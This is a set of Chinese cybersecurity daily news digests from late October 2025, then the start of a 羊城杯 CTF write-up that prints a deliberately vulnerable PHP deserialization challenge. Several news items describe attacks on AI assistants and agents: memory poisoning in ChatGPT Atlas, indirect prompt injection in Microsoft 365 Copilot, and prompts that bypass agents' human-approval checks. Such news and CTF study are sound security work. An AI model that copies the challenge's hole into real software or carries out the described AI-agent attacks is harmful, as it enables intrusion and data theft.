网络安全日报 2025年10月29日
1、ChatGPT Atlas浏览器现“记忆污染”漏洞 https://layerxsecurity.com/blog/layerx-identifies-vulnerability-in-new-chatgpt-atlas-browser/ LayerX Security研究人员披露,OpenAI的ChatGPT Atlas浏览器存在严重漏洞,攻击者可利用跨站请求伪造(CSRF)手法,将恶意指令写入AI助手的持久记忆,从而在多设备、多会话间持续执行任意代码。该漏洞可导致系统感染恶意软件、权限提升或数据外泄,且除非用户手动清除记忆,恶意指令将长期存在。研究指出,Atlas浏览器在防钓鱼能力上远弱于Chrome或Edge,仅能阻止约5.8%的恶意网 2、Chrome零日漏洞助推LeetAgent间谍传播 https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/ 卡巴斯基披露,利用已修补的Chrome沙箱逃逸漏洞CVE-2025-2783(CVSS 8.3),攻击者通过针对性钓鱼链接将意大利厂商Memento Labs开发的LeetAgent间谍软件植入受害者系统。攻击以短期有效的论坛诱饵触发浏览器内的验证脚本,再借漏洞实现远程代码执行并投放加载器。LeetAgent可通过HTTPS与C2通信,执行命令、注入代码、读写文件、记录按键并采集指定文档类型;在若干事件中还与更复杂的Dante间谍软件关联或接力。受 3、QNAP警告Windows备份软件受ASP.NET严重漏洞影响 https://www.qnap.com/en/security-advisory/qsa-25-44 QNAP发布安全警告称,其Windows备份工具NetBak PC Agent受影响于微软ASP.NET Core框架中的严重漏洞CVE-2025-55315。该漏洞存在于Kestrel ASP.NET Core Web服务器中,允许低权限攻击者通过HTTP请求走私绕过前端安全控制或劫持其他用户凭证。微软此前已将此漏洞评为ASP.NET Core史上“最严重”安全缺陷之一。QNAP提醒用户,若系统未及时更新ASP.NET Core组件,可能面临敏感数据泄露、文件篡改或拒绝服务风险。用户应尽 4、SideWinder利用ClickOnce攻击外交目标 https://www.trellix.com/blogs/research/sidewinders-shifting-sands-click-once-for-espionage/ 安全公司Trellix披露,印度新德里一欧洲使馆及南亚多国外交机构近期遭到APT组织SideWinder的新一轮攻击。该组织自2025年3月至9月通过多波钓鱼邮件发动攻击,伪装成来自巴基斯坦国防部的公文,诱导受害者下载“更新版Adobe Reader”。实则下载并执行基于ClickOnce机制的恶意应用,侧载签名合法的MagTek程序以加载恶意DLL“DEVOBJ.dll”。随后,模块化下载器ModuleIns 5、Qilin勒索组织利用Linux载荷和BYOVD入侵 https://blog.talosintelligence.com/uncovering-qilin-attack-methods-exposed-through-multiple-cases/ 安全公司报告称,勒索组织Qilin自2025年以来高频活跃,攻击者利用泄露管理凭证与钓鱼获得初始访问,随后通过RDP、Mimikatz等工具横向移动并窃取备份凭据,目标多为制造业、科研与批发行业。近期样本显示其将Linux勒索二进制与Windows 环境结合,借助合法远程管理工具(AnyDesk、ScreenConnect、Splashtop)和BYOVD易受攻击驱动(如eskle.sys)禁用防 6、通用汽车宣布押注AI:自研Gemini系统 https://www.anquanke.com/post/id/312822 最近的“GM Forward”媒体活动上,通用汽车(GM)宣布其软件战略发生重大转变,计划从2026年起将谷歌Gemini平台深度集成到旗下轿车、卡车和SUV产品线中。这款下一代对话式AI助手将取代目前许多通用汽车车型中搭载的“Google built-in”操作系统。 7、60多国签署《联合国打击网络犯罪公约》 https://www.freebuf.com/articles/454497.html 全球首部旨在预防和打击网络犯罪的国际公约今日在越南河内开放签署,并将在纽约联合国总部持续接受签署至2026年12月31日。该《联合国打击网络犯罪公约》于2024年12月经联合国大会通过,将在获得第40份批准书90天后正式生效。公约生效后,缔约国会议将定期召开,以加强各国能力建设、深化国际合作并审议执行情况,确保实现公约目标。 8、"短信钓鱼三人组":19.4万个恶意域名支撑全球钓鱼即服务活动 https://securityonline.info/smishing-triad-uncovered-194000-malicious-domains-power-global-phishing-as-a-service-campaign/ "短信钓鱼三人组"发起大规模全球钓鱼活动,仿冒邮政、银行等机构,已注册19.4万恶意域名。其高度分散的基础设施和Telegram上的PhaaS生态系统使攻击高效且难追踪,结合中美混合架构增强隐蔽性。 9、Pwn2Own爱尔兰站73个0Day漏洞共获102万美元奖金 https://cybersecuritynews.com/73-unique-0-day-vulnerabilities-pwn2own/ Pwn2Own爱尔兰站2025落幕,黑客利用73个0Day漏洞获102万美元奖金,突显网络安全挑战。赛事覆盖智能家居、打印机等设备,技术创新与厂商协作成亮点。Summoning Team夺冠,东京汽车黑客赛将启。 10、瑞典国营电力公司遭遇勒索软件攻击 https://www.secrss.com/articles/84401 2025年10月28日监测发现,瑞典电力公司(Svenska kraftnät)于当地时间10月27日晚间确认遭遇勒索软件攻击,导致约280GB的内部数据可能被窃取。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年10月28日
1、APT36利用DeskRAT木马攻击印度政府目标 https://blog.sekoia.io/transparenttribe-targets-indian-military-organisations-with-deskrat/ 网络安全公司Sekoia近日披露,巴基斯坦关联的APT组织Transparent Tribe(又名APT36)于2025年8月至9月间对印度政府机构发动鱼叉式钓鱼攻击,投放基于Golang语言开发的DeskRAT远控木马。攻击者通过伪装成官方指令的ZIP附件或云端链接传播恶意Desktop文件,诱导受害者打开伪装的PDF文档同时执行后门程序。该木马主要针对BOSS Linux系统,可通过WebSocket与指挥 2、YouTube“幽灵网络”滥用平台传播恶意软件 https://research.checkpoint.com/2025/youtube-ghost-network/ 网络安全公司Check Point揭露,一个名为“YouTube Ghost Network”的大规模恶意网络自2021年以来已在平台上发布超3000个恶意视频,利用被入侵或伪装的YouTube账号传播信息窃取类恶意软件。攻击者通过热门关键词如“破解软件”和“Roblox外挂”吸引用户点击视频描述或置顶评论中的下载链接,从而感染Lumma、Rhadamanthys、StealC、RedLine等窃密程序。该网络采用“角色分工”机制,分为上传、发帖和互动账号,协同制造可信度假 3、黑客利用基于RedTiger的恶意程序窃取Discord账户 https://www.netskope.com/blog/redtiger-new-red-teaming-tool-in-the-wild-targeting-gamers-and-discord-accounts 网络安全公司Netskope报告,威胁者滥用开源红队工具RedTiger的info-stealer构建恶意载体,主要针对法国Discord用户。攻击者将代码用PyInstaller打包成独立可执行文件、伪装为游戏或Discord相关应用,安装后扫描并提取Discord令牌、账户信息、邮箱、MFA与订阅及付款数据;还窃取浏览器保存的密码、cookies、加密钱包文件、游戏数据并 4、微软禁用下载文件预览防窃密攻击 https://support.microsoft.com/en-us/topic/file-explorer-automatically-disables-the-preview-feature-for-files-downloaded-from-the-internet-56d55920-6187-4aae-a4f6-102454ef61fb 微软宣布,自2025年10月安全更新起,Windows 11与Windows Server的文件资源管理器(File Explorer)将默认禁用对互联网下载文件的预览功能,以防止攻击者利用恶意文件窃取凭证。该措施适用于带有“网页标记”(Mark 5、Jingle Thief利用云环境大规模盗刷礼品卡 https://unit42.paloaltonetworks.com/cloud-based-gift-card-fraud-campaign/ 安全公司Unit 42披露,名为“Jingle Thief”的犯罪集团通过网络钓鱼与短信钓鱼窃取凭证,侵入零售与消费服务机构的云环境以大规模发行并兑现礼品卡。该组织自2021年底活动至今,偏好滞留式横向移动与身分滥用,深度搜寻SharePoint/OneDrive与发卡流程、创建收件箱规则并注册伪造认证器以绕过MFA,从而在不依赖自定义恶意软件的情况下长期维持访问并隐匿痕迹。研究者指出,攻击目标高度定制且以节假日消费高峰期变现为主,最终通过灰色市 6、OpenAI Atlas浏览器漏洞允许向ChatGPT注入恶意代码 https://www.freebuf.com/articles/ai-security/454414.html OpenAI新推出的ChatGPT Atlas浏览器存在严重漏洞,攻击者可借此向ChatGPT内存注入恶意指令,并在用户系统上执行远程代码。网络安全公司LayerX发现,该漏洞利用跨站请求伪造(CSRF)技术劫持已认证会话,可能导致设备感染恶意软件或被未授权访问。这一发现凸显了AI浏览器日益增长的安全风险——集成的LLM(大语言模型)会放大传统网络威胁。 7、朝鲜黑客组织Lazarus针对无人机行业发起窃密攻击 https://www.freebuf.com/articles/454169.html 朝鲜国家背景的黑客组织Lazarus(APT38)近期发起代号"DreamJob"的网络间谍行动,专门针对欧洲无人机技术研发企业。自2025年3月下旬起,攻击者已成功入侵中欧和东南欧地区三家国防相关机构,通过部署高级恶意软件窃取专有无人机技术。 8、“游蛇(银狐)”黑产密集仿冒各类流行应用进行传播 https://www.freebuf.com/articles/es/454365.html “游蛇”攻击组织,其他安全企业又称“银狐”、“谷堕大盗”等,主要针对国内用户进行攻击诈骗活动。安天在2022年下半年发现和分析游蛇组织的早期活动,包括伪装常用软件下载站和搜索引擎SEO和钓鱼邮件方式实施投放,采取白加黑方式执行,利用即时通讯软件(微信、企业微信等)进一步扩散。其主要获利方式为通过即时通讯软件拉群的方式进行诈骗,同时也对感染主机形成窃密能力,可能进行数据贩卖等其他活动。其传播的恶意文件变种极多、免杀手段更换极为频繁,影响到的个人和行业极为广泛。 9、70.6万余台BIND 9实例暴露在线易遭缓存投毒攻击 https://www.freebuf.com/articles/network/454177.html BIND 9 解析器曝出高危漏洞(CVE-2025-40778),攻击者可利用该漏洞实施缓存投毒攻击,将互联网流量重定向至恶意网站。互联网扫描公司 Censys 发现,全球超过 706,000 个暴露在外的 BIND 实例受此影响。该漏洞 CVSS 评分为 8.6 分,源于 BIND 对 DNS 响应中未经请求的资源记录处理过于宽松,使得非路径攻击者无需直接访问网络即可注入伪造数据。BIND 软件的维护方互联网系统联盟(ISC)于 2025 年 10 月 22 日发布公告,敦促管理员立即 10、Jira中存在权限漏洞,可篡改Jira JVM进程有权访问的文件 https://www.anquanke.com/post/id/312843 Atlassian披露了Jira Software Data Center和Server版本中存在的一个严重路径遍历漏洞,该漏洞可使已认证攻击者修改Jira Java虚拟机(JVM)进程可访问的文件。该漏洞编号为CVE-2025-22167,严重级别为高,CVSS评分为8.7,影响自2025年9月以来的多个产品版本。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年10月27日
1、朝鲜Lazarus组织渗透欧洲防务企业 https://www.welivesecurity.com/en/eset-research/gotta-fly-lazarus-targets-uav-sector/ 网络安全公司ESET披露,朝鲜黑客组织Lazarus近期通过“梦幻工作(Operation DreamJob)”行动入侵欧洲三家防务相关企业,目标集中于无人机(UAV)技术领域。攻击者伪装成大型企业招聘人员,以虚假职位诱导目标员工下载被植入恶意代码的开源程序插件,从而实现DLL旁加载并执行远控木马ScoringMathTea RAT或加载器BinMergeLoader(MISTPEN)。这些企业位于中欧和东南欧,均参与向乌 2、CISA警告Lanscope漏洞遭黑客利用 https://www.motex.co.jp/news/notice/2025/release251020/ 美国网络安全与基础设施安全局(CISA)发布警告称,黑客正积极利用日本Motex公司Lanscope Endpoint Manager中的严重漏洞CVE-2025-61932发起攻击。该漏洞评分9.3,源于请求来源验证不当,攻击者可通过特制数据包在未经认证的情况下远程执行任意代码。Motex确认部分客户环境已收到恶意数据包,表明漏洞正被零日利用。受影响版本为9.4.7.2及以前版本,修复已在9.4.7.3等多个子版本中发布。目前暂无临时缓解措施,唯一防护方式是立即更新客户端。日本C 3、新加坡遭遇大规模投资欺诈 https://www.group-ib.com/blog/immediate-era-fraud-singapore/ 一场大规模的诈骗活动盗用了新加坡政府官员的图像和肖像,诱骗新加坡公民和居民参与一个欺诈性投资平台。Group-IB表示:“该诈骗活动依赖于付费谷歌广告、旨在掩盖欺诈和恶意活动的中介重定向网站以及极具欺骗性的虚假网页。受害者最终被引导至一个在毛里求斯注册的外汇投资平台,该平台以看似合法的法人实体身份运营,并持有官方投资许可证。这种结构制造了一种合规的假象,却为跨境欺诈活动提供了便利。” 在这些诈骗平台上,受害者被要求填写个人信息,然后他们会通过电话主动催促他们存入大量资金。 4、Oat++ MCP中的安全漏洞可劫持MCP会话 https://jfrog.com/blog/mcp-prompt-hijacking-vulnerability/ Oat++实现的Anthropic模型上下文协议 (MCP) 中存在一个安全漏洞,攻击者可以利用该漏洞预测或捕获活动AI对话中的会话ID,劫持MCP会话,并通过oatpp-mcp服务器注入恶意响应。该漏洞被称为“Prompt Hijacking”,编号为CVE-2025-6515(CVSS评分:6.8)。虽然服务器发送事件 (SSE)传输使用的生成会话ID旨在将响应从MCP服务器路由到客户端,并区分不同的MCP客户端会话,但该攻击利用了SSE不要求会话ID唯一且加密安全(较新 5、微软Copilot被滥用于OAuth钓鱼攻击 https://securitylabs.datadoghq.com/articles/cophish-using-microsoft-copilot-studio-as-a-wrapper/ Datadog安全实验室披露一种名为“CoPhish”的新型钓鱼技术,攻击者利用Microsoft Copilot Studio的聊天代理功能发起OAuth令牌窃取攻击。该方法通过在微软合法域名下托管伪造登录页面,诱骗用户或管理员授权恶意应用,从而窃取访问令牌。研究人员指出,攻击者可在“登录”主题中自定义验证流程,将令牌发送至外部服务器,甚至可针对高权限管理员实施攻击。微软已确认问题并计划在后续更新中 6、过时插件引发大规模WordPress攻击 https://www.wordfence.com/blog/2025/10/mass-exploit-campaign-targeting-arbitrary-plugin-installation-vulnerabilities/ 研究人员披露,一场针对GutenKit与Hunk Companion旧版插件的大规模利用活动正在肆虐,攻击者借三项高危漏洞(CVE-2024-9234、CVE-2024-9707、CVE-2024-11972)未经认证安装并激活任意插件,最终可实现远程代码执行。Wordfence在10月8–9日两天内阻止了约870万次攻击尝试,攻击者常通过含有后门的恶意插件( 7、黑客伪造身故申请攻击LastPass用户 https://blog.lastpass.com/posts/possible-cryptochameleon-social-engineering-campaign-targeting-lastpass-customers-and-more 密码管理服务商LastPass警告称,自10月中旬起,黑客团伙CryptoChameleon(UNC5356)发动钓鱼攻击,冒充“遗产继承申请”通知,诱骗用户输入主密码以窃取密码库与Passkey。攻击邮件伪称家属提交了死亡证明,请求访问受害者账户,并附带伪造的代理编号提升可信度。若用户点击“取消申请”链接,将被引导至假冒的lastpassrecov 8、微软WSUS关键RCE漏洞已被实战利用 https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability 安全研究与厂商报告称,编号为CVE-2025-59287的关键性WSUS远程代码执行漏洞已被实战利用且出现公开PoC代码。该漏洞仅影响启用了“作为更新源”的WSUS Server角色的服务器,可在无需交互或权限的情况下以SYSTEM权限执行代码,存在跨服务器蠕虫传播风险。Eye Security、Huntress等组织发现针对暴露端口(8530/8531)的扫描与利用行 9、F1赛事遭遇网络攻击:黑客入侵车手门户网站 https://www.csoonline.com/article/4078450/formel-1-betroffen-cyberattacke-auf-fahrer-portal.html 黑客入侵FIA车手门户获取F1车手数据,自称爱好者旨在揭露漏洞。FIA迅速保护数据并与黑客合作修复系统,未泄露敏感信息。事件凸显网络安全重要性。 10、 研究人员揭露大规模YouTube恶意软件分发网络 https://www.helpnetsecurity.com/2025/10/23/youtube-malware-distribution-network-ghost/ Check Point发现"YouTube幽灵网络",利用3000多个入侵或伪造频道以破解软件为诱饵传播恶意软件,采用分工模式规避检测,主要传播信息窃取程序,2025年恶意视频增长两倍。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年10月24日
1、PolarEdge恶意僵尸网络扩散至路由器 https://blog.sekoia.io/polaredge-backdoor-qnap-cve-2023-20118-analysis/ 安全研究人员披露,名为PolarEdge的僵尸网络通过利用路由器漏洞(含Cisco的CVE‑2023‑20118)感染Cisco、ASUS、QNAP与Synology等设备,目标疑似用于构建运营中继箱(ORB)式基础设施。该恶意ELF后门基于TLS(使用mbedTLS)实现内置服务器/回连模式,可上报主机指纹并执行远程命令;配置位于ELF末尾并经单字节XOR混淆。样本携带多种反分析与进程伪装手段,虽不保证重启持久化,但通过父子进程监控实现自动重启。研 2、TP-Link修复四项Omada网关设备漏洞 https://support.omadanetworks.com/en/document/108456/ TP-Link发布安全更新,修复影响Omada网关设备的四个漏洞,其中两项为高危命令执行漏洞。包括CVE-2025-6542可被远程未认证攻击者利用执行任意命令,以及CVE-2025-6541、CVE-2025-7850需登录管理界面或持管理员权限即可触发。另一漏洞CVE-2025-7851涉及权限管理不当,可在受限条件下获取root shell。受影响设备涵盖ER8411、ER7412-M2、ER707-M2、ER7206等多个型号。TP-Link建议用户尽快升级固件并检查配置,以确 3、Jira路径遍历漏洞可导致服务器/数据中心任意文件写入 https://www.freebuf.com/articles/453764.html Atlassian公司已发布补丁,修复影响Jira Software数据中心与服务器版以及Jira Service Management数据中心与服务器版的高危路径遍历漏洞(CVE-2025-22167)。该漏洞CVSS评分为8.7分,攻击者可借此在运行受影响Jira版本的系统上执行任意文件写入操作,若与其他漏洞利用链结合,可能导致数据损坏或远程代码执行。 4、主流AI Agent存在关键参数注入漏洞,可实现远程代码执行 https://www.freebuf.com/articles/ai-security/453735.html 三家未公开名称的热门AI Agent平台存在关键参数注入漏洞,攻击者可通过看似无害的提示绕过人工审批防护机制,实现远程代码执行(RCE)。Trail of Bits指出,这些漏洞利用了为提升文件搜索和代码分析等任务效率而预先批准的系统命令,暴露出智能体AI系统中普遍存在的设计缺陷。 5、Sauter AG 产品中存在严重漏洞 https://www.anquanke.com/post/id/312770 瑞士楼宇自动化制造商Sauter AG披露了其modulo 6设备嵌入式固件中的六个漏洞,警告攻击者可能利用这些缺陷实现远程控制、权限提升和破坏系统完整性。其中编号为CVE-2025-41723的漏洞CVSS评分为9.8,属于严重级别。 6、ABB已停产负载控制器存在严重漏洞可导致未授权的管理员访问 https://www.anquanke.com/post/id/312781 工业自动化巨头ABB披露了其ALS-mini-S4/S8 IP智能负载控制器中存在的严重身份验证缺失漏洞(CVE-2025-9574),这些设备广泛部署于能源管理和负载优化系统中。该漏洞允许未认证远程攻击者通过嵌入式Web界面访问并修改设备配置,可能导致工业设施中的电力分配中断或能源效率操作异常。 7、Adobe Commerce漏洞使许多电商网站遭遇攻击 https://www.securityweek.com/exploitation-of-critical-adobe-commerce-flaw-puts-many-ecommerce-sites-at-risk/ 网络安全公司 Sansec 报告称,黑客已经开始利用 Adobe Commerce 和 Magento 开源产品中的一个严重漏洞,该漏洞被追踪为 CVE-2025-54236(CVSS 评分为 9.1),描述为不正确的输入验证问题,导致安全功能绕过。 8、BIND 更新解决高危缓存投毒漏洞 https://www.securityweek.com/bind-updates-address-high-severity-cache-poisoning-flaws/ 互联网系统联合组织(ISC)于周三宣布了 BIND 9 更新,以解决包括缓存投毒漏洞在内的高严重性漏洞。第一个问题是流行 DNS 服务器软件中使用的伪随机数生成器(PRNG)的弱点,在特定情况下,可能允许攻击者预测将被使用的源端口和查询 ID,攻击者可能会滥用这个安全缺陷,跟踪为 CVE-2025-40780(CVSS 评分为 8.6),在欺骗攻击中,如果成功,可能导致 BIND 缓存攻击者的响应。 9、Lanscope 终端管理器零日漏洞已被利用 https://www.securityweek.com/lanscope-endpoint-manager-zero-day-exploited-in-the-wild/ 京瓷通信子公司 Motex 本周发布了针对 Lanscope Endpoint Manager 中一个严重漏洞的紧急补丁,该漏洞作为零日漏洞已被野外利用。追踪为 CVE-2025-61932(CVSS 评分为 9.8),该漏洞被描述为“通信通道来源验证不当”问题,允许远程攻击者发送精心制作的包并实现任意代码执行。 10、三星Galaxy S25 零日漏洞可远程启用摄像头和追踪位置 https://cybersecuritynews.com/samsung-galaxy-s25-0-day-vulnerability/ 在 2025 年爱尔兰 Pwn2Own 活动中,来自 Interrupt Labs 的安全研究人员 Ben R.和 Georgi G.展示了他们的一项令人印象深刻的成就,成功利用了三星 Galaxy S25 的零日漏洞。这使得他们能够完全控制设备,激活摄像头并追踪用户的位置。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年10月23日
1、GlassWorm蠕虫入侵VS Code与OpenVSX扩展平台 https://www.koi.ai/blog/glassworm-first-self-propagating-worm-using-invisible-code-hits-openvsx-marketplace#heading-5 Koi Security研究人员披露,一场名为“GlassWorm”的供应链攻击正在针对OpenVSX与Microsoft VS Code扩展平台的开发者。该自传播恶意软件通过隐藏的Unicode字符伪装代码,利用被盗账户信息在多个扩展间传播,迄今已感染约3.58万次。GlassWorm可窃取GitHub、npm与加密钱包凭证,并部署SOCKS代理与HVNC组 2、Pwn2Own爱尔兰首日曝34个零日漏洞 https://www.bleepingcomputer.com/news/security/hackers-exploit-34-zero-days-on-first-day-of-pwn2own-ireland/ 在2025年Pwn2Own爱尔兰黑客竞赛首日,参赛研究人员共成功利用34个零日漏洞,赢得总计52.25万美元奖金。来自Team DDOS的Bongeun Koo与Evangelos Daravigkas通过八个零日漏洞链攻击QNAP路由器与NAS设备,单项奖金达10万美元。Synacktiv、DEVCORE、Summoning等团队亦成功攻破Synology、QNAP与Home 3、Cursor、Windsurf曝90余个Chromium漏洞 https://www.ox.security/blog/94-Vulnerabilities-in-Cursor-and-Windsurf-Put-1-8M-Developers-at-Risk/ 安全公司Ox Security披露,AI 代码编辑器Cursor与Windsurf因内嵌过旧的Electron/Chromium与V8引擎,累计存在94个已修补的n-day漏洞,约180万开发者面临风险。研究人员以CVE-2025-7656为例,演示通过deeplink触发渲染器崩溃(DoS),并警示真实攻击可构造成内存破坏或远程执行。攻击向量包括恶意扩展、带毒的文档/README预览与钓鱼链接 4、GitLab 多安全漏洞可致攻击者触发拒绝服务状态 https://www.freebuf.com/articles/453728.html GitLab 已紧急发布社区版(CE)和企业版(EE)的 18.5.1、18.4.3 和 18.3.5 补丁版本,修复多个关键安全漏洞,其中包括数个高危拒绝服务(DoS)漏洞。 5、Rust异步TAR库TARmageddon漏洞可植入恶意档案 https://www.freebuf.com/articles/453730.html Edera安全团队披露了Rust异步TAR库async-tar及其分支(如tokio-tar)中存在的一个高危漏洞(CVE-2025-62518,CVSS评分8.1),该漏洞被命名为TARmageddon。攻击者可利用此漏洞实现远程代码执行。 6、微软365 Copilot 提示注入漏洞可导致攻击者窃取敏感数据 https://www.freebuf.com/articles/ai-security/453577.html 研究人员发现Microsoft 365 Copilot(M365 Copilot)存在一项复杂漏洞,攻击者可通过间接提示注入攻击窃取租户敏感数据,包括近期电子邮件内容。 7、AWS服务大规模中断,基础设施故障影响全球企业 https://hackread.com/aws-outage-mitigated-impact-what-happened/ AWS云服务DNS故障引发全球中断,影响Reddit、金融平台等多领域,凸显数字基础设施依赖风险,专家呼吁加强备份与监管。 8、Xubuntu官方网站遭入侵,下载链接被替换为恶意软件 https://securityonline.info/warning-xubuntu-website-compromised-to-deliver-malware/ Xubuntu官网遭黑客入侵,下载链接被替换为含恶意EXE的ZIP文件,32款安全引擎标记为后门程序。攻击者捆绑正常安装程序掩盖恶意行为,疑似窃取加密货币钱包等财务信息。团队已移除恶意链接。 9、逾7.1万台WatchGuard设备存在远程代码执行漏洞风险 https://cybersecuritynews.com/watchguard-devices-rce-attack/ WatchGuard防火墙曝高危漏洞CVE-2025-9242,全球超7.1万台设备未修复,攻击者可远程执行任意代码。该漏洞源于IKEv2协议缺陷,CVSS评分9.8,建议立即升级系统或禁用IKEv2协议。 10、微软紧急修复Windows恢复环境关键漏洞 https://securityonline.info/emergency-fix-microsoft-rushes-patch-for-critical-windows-recovery-bug/ 微软紧急修复Windows 11更新KB5066835引发的严重漏洞:localhost访问问题已通过KIR解决,但WinRE输入故障需额外补丁KB5070773修复,否则用户将无法使用恢复功能。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年10月22日
1、 新型.NET后门CAPI攻击俄汽车与电商业 https://www.seqrite.com/blog/seqrite-capi-backdoor-dotnet-stealer-russian-auto-commerce-oct-2025/ Seqrite Labs披露一项针对俄罗斯汽车与电商领域的网络钓鱼行动,攻击者通过含ZIP压缩包的邮件投递名为“CAPI Backdoor”的新型.NET恶意软件。压缩包内含伪装为税收法规通知的俄文诱饵文档及同名LNK快捷方式,后者利用系统合法程序rundll32.exe加载后门DLL“adobe.dll”,实现“借壳执行”。该后门具备检测管理员权限、识别防病毒软件、窃取浏览器数据、截图、收集系统信 2、131款Chrome扩展劫持WhatsApp进行大规模垃圾信息活动 https://socket.dev/blog/131-spamware-extensions-targeting-whatsapp-flood-chrome-web-store 安全公司Socket揭露,一场针对巴西用户的协调性滥用活动利用了131个伪装为WhatsApp Web自动化工具的Chrome扩展,用于大规模垃圾信息发送。这些扩展共享相同代码与基础设施,合计拥有约2万活跃用户,由“WL Extensão”及其变体账户发布,源自巴西公司DBX Tecnologia的白标授权计划。攻击者通过这些扩展在WhatsApp Web中直接注入代码,自动批量发送信息、绕过反垃圾机制,并以“CR 3、TikTok视频蔓延ClickFix窃密攻击 https://www.bleepingcomputer.com/news/security/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks/ 安全研究者发现,犯罪分子在TikTok上发布伪装为“免费激活”指南的视频,利用ClickFix社工手法诱导用户在PowerShell中运行一行命令以下载并执行恶意脚本,从而感染信息窃取器(如Aura Stealer)并窃取浏览器凭证、钱包及其它敏感数据。ISC与BleepingComputer的分析指出,攻击链会从远程站点(例如 slmgr[.]win)检索脚本并进一步从 4、微软警告十月更新导致智能卡认证故障 https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-25h2#3697msgdesc 微软发布通告称,2025年10月的Windows安全更新引发了智能卡认证与证书相关问题,影响范围涵盖所有版本的Windows 10、Windows 11及Windows Server。该问题源于微软为增强加密安全性而默认启用的一项更改,将RSA智能卡证书从CSP迁移至KSP机制,以防止CVE-2024-30098漏洞利用。然而,该调整导致部分系统出现无法识别智能卡、签名失败及“invalid provider 5、CISA 警告称苹果、Kentico、微软多个漏洞已被利用 https://www.securityweek.com/cisa-warns-of-exploited-apple-kentico-microsoft-vulnerabilities/ 美国网络安全机构 CISA 于周一警告称,最近公开的 Windows SMB 客户端和 Kentico Xperience CMS 漏洞已在野外被利用。CVE-2022-48503(CVSS 评分为 8.8),一个在苹果产品中的任意代码执行问题,已经在野外被滥用。 6、无印良品因物流合作伙伴遭勒索攻击暂停线上销售 https://www.freebuf.com/articles/es/453589.html 日本零售巨头无印良品(Muji)在其物流合作伙伴Askul遭受勒索软件攻击后,暂停了线上销售业务。此次网络事件导致配送服务和线上商店功能中断,包括订单处理和应用服务。 7、TP-Link Omada网关曝高危漏洞,可未授权远程执行命令 https://www.freebuf.com/articles/es/453472.html TP-Link Systems 已发布新版固件,修复其广受欢迎的 Omada 网关系列产品中四个高危漏洞,这些产品包括 ER605、ER7206、ER8411 等在企业和小型商业网络中广泛部署的型号。编号为 CVE-2025-6541、CVE-2025-6542、CVE-2025-7850 和 CVE-2025-7851 的漏洞可使攻击者在受影响设备上执行任意操作系统命令,某些情况下甚至无需认证。 8、杜比解码器零点击漏洞曝光,安卓用户可能遭RCE https://www.freebuf.com/articles/system/453416.html 杜比DDPlus解码器中被披露存在一处关键零点击漏洞,攻击者可通过看似无害的音频消息远程执行恶意代码。谷歌Project Zero团队的Ivan Fratric与Natalie Silvanovich发现,DDPlus解码器在处理音频文件演进数据时存在越界写入缺陷。 9、GlassWorm蠕虫利用隐形Unicode与区块链实现隐蔽C2通信 https://securityonline.info/glassworm-supply-chain-worm-uses-invisible-unicode-and-solana-blockchain-for-stealth-c2/ 全球首个VS Code扩展恶意软件GlassWorm被发现,结合隐形Unicode注入、区块链C2和RAT功能,已感染3.58万次安装。它能自主传播、窃取凭证并控制设备,代表供应链攻击新高度,目前仍在活跃扩散。 10、微软WSUS曝高危漏洞PoC 利用代码已公开 https://cybersecuritynews.com/poc-wsus-rce-vulnerability/ 微软WSUS(Windows Server Update Services )曝高危漏洞CVE-2025-59287(CVSS 9.8),允许未授权攻击者以SYSTEM权限远程执行代码,影响2012-2025所有版本。PoC已公开,建议立即应用10月补丁并隔离WSUS服务器,防范供应链攻击风险。 声明 以上内容原文自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记2025羊城杯部分题目的解题思路
0.前言 好久没打CTF了,打个羊城杯回顾一下,记录一下做题过程。 1.web1 给了份php代码 <?php error_reporting(0); highlight_file(__FILE__); class A {    public $first;    public $step;    public $next;    public function __construct() {        $this->first = "继续加油!";   }    public function start() {        echo $this->next;   } } class E {    private $you;    public $found;    private $secret = "admin123";    public function __get($name){        if($name === "secret") {            echo "<br>".$name." maybe is here!</br>";            $this->found->check();       }   } } class F {    public $fifth;    public $step;    public $finalstep;    public function check() {        if(preg_match("/U/",$this->finalstep)) {            echo "仔细想想!";       }        else {            $this->step = new $this->finalstep();           ($this->step)();       }   } } class H {    public $who;    public $are;    public $you;    public function __construct() {        $this->you = "nobody";   }    public function __destruct() {        $this->who->start();   } } class N {    public $congratulation;    public $yougotit;    public function __call(string $func_name, array $args) {        return call_user_func($func_name,$args[0]);   } } class U {    public $almost;    public $there;    public $cmd;    public function __construct() {        $this->there = new N();        $this->cmd = $_POST['cmd'];   }    public function __invoke() {        return $this->there->system($this->cmd);   } } class V {    public $good;    public $keep;    public $dowhat;    public $go;    public function __toString() {        $abc = $this->dowhat;        $this->go->$abc;        return "<br>Win!!!</br>";   } } unserialize($_POST['payload']); ?> 代码审计后一看就能看到unserialize这个危险函数 